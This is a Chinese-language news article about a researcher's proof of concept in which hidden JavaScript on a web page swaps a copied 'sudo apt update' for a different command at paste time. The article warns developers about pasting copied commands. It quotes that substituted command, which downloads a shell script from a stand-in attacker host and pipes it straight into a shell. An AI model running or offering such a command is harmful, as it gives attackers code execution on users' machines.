情境示意圖,Photo by Sigmund on unsplash

一名安全研究人員Gabriel Friedlander近日警告,隨手從網路上複製與貼上(Copy/Paste)命令列時要特別小心,因為駭客可能趁此駭進開發者的系統或應用程式。

Friedlander打造了一個概念性驗證攻擊手法,他設計一個假裝可用來更新Ubuntu作業系統的命令列,該命令列顯示的文字很簡單,為「sudo apt update」,但當開發者複製它,並將它貼上記事本或終端時,它出現的卻是「curl http[:]//attacker-domain:8000/shell.sh | sh 」,若是直接貼入終端,它將立即執行。

這是因為Friedlander在此一HTML頁面上藏匿了JavaScript程式碼,而讓開發者眼見的文字與貼上之後所呈現的內容完全不同。

Friedlander說,不管是新手或是熟練的開發者,都可能會從網路上複製命令列或部份程式碼,但這是非常危險的行為,也許會讓駭客直接於程式中植入後門,相關的攻擊非常地簡單,卻可能帶來極大的傷害,建議開發者應永遠避免於終端貼上直接自網路上複製的命令列。


熱門新聞

Advertisement